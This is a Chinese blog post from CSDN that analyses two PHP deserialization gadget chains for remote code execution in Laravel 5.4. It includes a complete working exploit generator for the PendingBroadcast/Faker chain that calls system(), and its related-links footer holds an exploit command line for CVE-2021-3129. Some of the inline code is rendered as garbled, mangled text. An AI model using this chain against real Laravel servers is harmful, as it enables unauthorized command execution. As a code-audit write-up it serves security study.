laravel 5.4 RCE分析(2条链)

最新推荐文章于 2024-04-28 11:25:26 发布
最新推荐文章于 2024-04-28 11:25:26 发布
阅读量202 收藏
点赞数
分类专栏: 代码审计 文章标签: php laravel 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51353029/article/details/117560775
版权

在此之前看过其他师傅的审计文章,看完之后自己跟着复现(虽然都是5.4版本,但是有些地方代码依然不一样,导致部分链子并未完全复现成功,有兴趣的可以自己看文章自己尝试)

第一条链子(成功):_call

找到destruct函数:
在这里插入图片描述
跟进一下这几个参数:
首先是events:
在这里插入图片描述
发现events是可控的
在这里插入图片描述
event同样可控,再跟进一下dispatch函数
在这里插入图片描述
很多地方都定义了function dispatch 函数
再来看一下我们的入口点__destruct()函数:有两个思路:第一个是调用_call方法,看看能不能调用方法进行命令执行。第二个方法是再dispatch函数里面去寻找可以命令执行的函数

 public function __destruct()
    {
        $this->events->dispatch($this->event);
    }

思路:从__call方法入手寻找链子:
在这里插入图片描述
__call方法有很多,这里采用很多师傅都使用的Faker里面的__call方法:
跟进一下具体参数:
在这里插入图片描述
这里看见了call_user_func_ayyry函数,联想到我们可以调用内置的system函数进行命令执行,getFormatter()方法里面存在return,可以返回值
那么接下来的一步就是去看这里存在的变量,我们是否可控,如果可控,那就直接一把梭哈。

可以发现:$formatter, $arguments 都是没有被定义过的,都是我们实际传入的,那么整理一下思路:

1.首先调用__destruct方法:
t h i s − > e v e n t s − > d i s p a t c h ( this->events->dispatch( this>events>dispatch(this->event);
2.调用_call方法:
t h i s − > f o r m a t ( this->format( this>format(method, $attributes)
3.调用format方法:

	 public function format($formatter, $arguments = array())
    {
        return call_user_func_array($this->getFormatter($formatter), $arguments);
    }

4.通过call_user_func_array调用system方法实现RCE
具体参数可控我们下面再说:
这里借用firebasky师傅文章里面的图:
在这里插入图片描述这里有个地方困扰了我一下,看WP的时候没有看懂 这里特意截图出来

在这里插入图片描述
EXP:

<?php

namespace Illuminate\Broadcasting
{
    class PendingBroadcast
    {
        protected $events;
        protected $event;

        function __construct($events, $cmd)
        {
            $this->events = $events;
            $this->event = $cmd;
        }
    }
}
namespace Faker
{
    class Generator
    {
        protected $formatters;

        function __construct($function)
        {
            $this->formatters = ['dispatch' => $function];
        }
    }
}
namespace{
    $a = new Faker\Generator('system');
    $b = new Illuminate\Broadcasting\PendingBroadcast($a,'dir');
    echo urlencode(serialize($b));
}

第二条链子(未成功):_call

依然是从_call方法入手,只不过是调用了不同的call方法:vendor\laravel\framework\src\Illuminate\Validation\Validator.php
在这里插入图片描述

看见这个_call方法我们需要分析一下:rule的值可控,如果不能进入if,那么这个_call方法对我们来说一无用处。再来看看if里面的callExtension方法对我们是否有用如果没用那么我们进入了if也是白进入
在这里插入图片描述
存在call_usr_func_arry,极大可达是我们的利用点,查看一下如何进入if:
判断一个对象是否是某个类的实例

<?php
$obj = new A();
if ($obj instanceof A) {
  echo 'A';
}//echo A;

而这里我们的$callback内容很明显是一个字符串,没有办法实例化Closure,因此这个办法行不通。
再去看一下callClassBasedExtension方法是否可行:

   protected function callClassBasedExtension($callback, $parameters)
    {
        list($class, $method) = Str::parseCallback($callback, 'validate');

        return call_user_func_array([$this->container->make($class), $method], $parameters);
    }




  public static function parseCallback($callback, $default = null)
    {
        return static::contains($callback, '@') ? explode('@', $callback, 2) : [$callback, $default];
    }

看了一下,遂放弃。
与原WP不同的地方在于:
在这里插入图片描述原WP调用call_suer_cunf_arry的if是 is_callable,而我这里是instanceof,遂放弃

还有2条链子是dispatch方法,目前没怎么看,后面会进行补充。

hahahahaha!
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
laravel5.4版本
03-10
Laravel是一套简洁、优雅的PHP Web开发框架(PHP Web Framework)。它可以让你从面条一样杂乱的代码中解脱出来;它可以帮你构建一个完美的网络APP,而且每行代码都可以简洁、富于表达力。 在Laravel中已经具有了一套高级的PHP ActiveRecord实现 -- Eloquent ORM。它能方便的将“约束(constraints)”应用到关系的双方,这样你就具有了对数据的完全控制,而且享受到ActiveRecord的所有便利。Eloquent原生支持Fluent中查询构造器(query-builder)的所有方法。
laravel 5.4 php版本,从laravel 5.4更新laravellaravel 5.5
weixin_28757113的博客
04-12 365
我正在尝试将5.4版本的laravel更新到5.5.我通过laravel指南完成了所有工作:https://laravel.com/docs/master/upgrade当我尝试使用命令时:composer update结果是:Loading composer repositories with package informationUpdating dependencies (including...
Laravel5.4快速开发简书网站——2-2Laravel1.0-5.4版本演进
weixin_46036815的博客
09-28 242
Laravel5.4快速开发简书网站
laravel-8.4.2-rce
05-28
laravel-8.4.2-rce 设置环境 git clone https://github.com/laravel/laravel.git cd laravel git checkout e849812 composer install composer require facade/ignition==2.5.1 php artisan serve 用法 python3 exploit.py http://pwnme.me:8000 /var/www/html/laravel/storage/logs/laravel.log ' uname -a ' 参考
Laravel RCE(CVE-2021-3129)复现
m0_64815693的博客
01-27 2242
CVE-2021-3129漏洞复现 Laravel Debug mode RCE
CVE-2021-3129:Laravel调试RCE
05-26
Laravel debug rce 食用方法 执行docker-compse up -d启动环境 访问8888端口后点击首页面的generate key就可以复现了 关于docker环境想说的几点: 把.env.example复制到.env作用是开启debug环境 关闭了php.ini的phar...
Log4j2 RCE漏洞分析
03-14
记录一下log4j2 RCE的原理
Yii框架反序列化RCE利用链分析1
08-03
1. 对比补丁 2. 分析利用链 3. 通过利用链构造 payload
Yii2框架Gii模块 RCE 分析 .pdf
09-05
Yii2框架Gii模块 RCE 分析 安全体系 安全测试 网络安全 web安全 应急响应
laravel 5.5 RCE分析(四条链)
E1even的博客
06-08 396
第一条链子(和5.4一样的链子) 依然是找到_destruct函数,这里我们依然先从54漏洞的位置来分析: 再寻找_call函数之前,先梳理一下我们通过_call方法的思路: 首先events变量是要去实例化一个类,而且这个类中不存在dispatch方法或者可以被我们RCERCE这种情况概率不大基本可以忽略,其次dispatch应该是一个可控的数组,我们通过这个可控的数组传入system命令,然后event就是我们的cmd 思路清楚了,再来开始审计把: 寻找_call方法: 同样还是找到了larave
laravel 58 RCE分析(一条链子)
E1even的博客
06-10 221
文章目录写在最前面和laravel55 一样的EXP寻找一个新的链子->dispatch:漏洞分析:继续分析:最终EXP:总结: 写在最前面 之前审计过laravel54 55的框架,这次继续跟着WP审计一下laravel58,这次链子相比于前面两个框架,相比来说更为复杂一点,因此再审计的过程,建议读者不断回溯代码,理解每个参数变量的来源,环境搭建这里不做讲解了,直接进行分析laravel55 一样的EXP 首先依然是寻找_construct方法:这里找的是 :Illuminate\Broadca
CVE-2019-9081:laravel框架序列化RCE复现分析
bamanju0574的博客
09-10 644
这里贴上两篇大佬的分析的帖子 本人习惯把平常的一些笔记或者好的帖子记录在自己的博客当中,便于之后遇到同样的漏洞时快速打开思路 1.https://xz.aliyun.com/t/5510#toc-8 2.https://skysec.top/2019/07/22/CVE-2019-9081-Laravel-Deserialization-RCE-Vulnerability/#%E6...
Laravel反序列化实现RCE
p4nic的博客
08-28 585
Laravel反序列化实现RCE,版本5.1和7.30
再谈Laravel Debug mode RCE(CVE-2021-3129)漏洞
wangluoanquan111的博客
08-10 2248
Laravel是一套简洁、开源的PHP Web开发框架,旨在实现Web软件的MVC架构。2021年01月12日,Laravel被披露存在一个远程代码执行漏洞(CVE-2021-3129)。当Laravel开启了Debug模式时,由于Laravel自带的Ignition组件对file_get_contents()和file_put_contents()函数的不安全使用,攻击者可以通过发起恶意请求,构造恶意Log文件等方式触发Phar反序列化,最终造成远程代码执行。
php laravel框架 rce分析 cve-2018-15133
whatday的专栏
08-30 1821
本文将记录在APP_KEY泄露情况下的Laravel RCE漏洞。该漏洞可以分别在两个地方触发,一个是直接添加在cookie字段,例如:Cookie: ATTACK=payload;另一处是在HTTP Header处添加X-XSRF-TOKEN字段,例如:X-XSRF-TOKEN: payload。漏洞影响版本:5.5.x<=5.5.40、5.6.x<=5.6.29。 环境搭建 这里我的测试环境为Debian9+apache+PHP7.2+Laravel5.6....
RCE无参数构造
nobugnomoney的博客
05-24 1254
一、RCE无参数构造 无参rce,就是说在无法传入参数的情况下,仅仅依靠传入没有参数的函数套娃就可以达到命令执行的效果,这在ctf中也算是一个比较常见的考点,接下来就来详细总结总结它的利用姿势。 核心的代码 if(';' === preg_replace('/[^\W]+\((?R)?\)/', '', $_GET['code'])) { eval($_GET['code']); } 也就是说只能传入函数(),但是()里面能有参数,要是有参数的话最终的返回值不是;就不能进行匹配。例如传入A
RCE(命令执行)总结
leekos的博客,分享web安全相关知识~
01-05 2175
RCE(命令执行)总结
supervisor 简单理解
最新发布
qq_42857358的博客
04-28 286
test.ini文件内容。
如何分析连接里是否含有rce
11-20
分析一个连接是否包含远程命令执行(Remote Code Execution,RCE),可以采取以下步骤: 1. 观察链接:首先,仔细观察链接的来源和目标。检查链接是否包含可疑的域名、IP 地址或路径。如果链接看起来不正常或来自...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值